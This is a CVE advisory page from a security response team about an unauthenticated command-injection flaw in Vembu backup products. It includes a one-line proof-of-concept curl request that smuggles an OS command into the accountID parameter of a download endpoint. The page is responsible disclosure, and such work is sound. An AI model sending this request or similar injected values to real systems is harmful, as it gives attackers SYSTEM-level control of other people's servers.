CVE-2021-26472

Unauthenticated remote command execution with SYSTEM privileges in Vembu products

CVE	CVE-2021-26472
Title	Unauthenticated remote command execution with SYSTEM privileges in Vembu products
Case	DIVD-2020-00011
Credits	Discovered by Wietse Boonstra () Addional research by Frank Breedijk ()
CVSS
References	https://csirt.divd.nl/cases/DIVD-2020-00011/ ( x_refsource_CONFIRM ) https://csirt.divd.nl/2021/05/11/Vembu-zero-days/ ( x_refsource_CONFIRM ) https://www.wbsec.nl/vembu ( x_refsource_CONFIRM ) https://csirt.divd.nl/cves/CVE-2021-26472/ ( x_refsource_CONFIRM )
Problem type(s)	n/a
Date published	07 Jul 2021 00:00 CEST
Last modified	04 Feb 2022 22:33 CET

Description

In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1 installed on Windows, the http API located at /consumerweb/secure/download.php. Using this command argument an unauthenticated attacker can execute arbitrary OS commands with SYSTEM privileges.

How to reproduce

Step 1: Install a vulnerable product on Windows

Step 2: execute the following http request

$ curl 'http://local/consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami'

Step 3: Result

Screenshot that proves RCE happened with SYSTEM privileges

Impact

This vulnerability allows an attacker to execute arbitrary windows commands with full system privileges. A.k.a. a full system compromise.

JSON version.

DIVD CSIRT

CVE-2021-26472

Unauthenticated remote command execution with SYSTEM privileges in Vembu products

Description

How to reproduce

Impact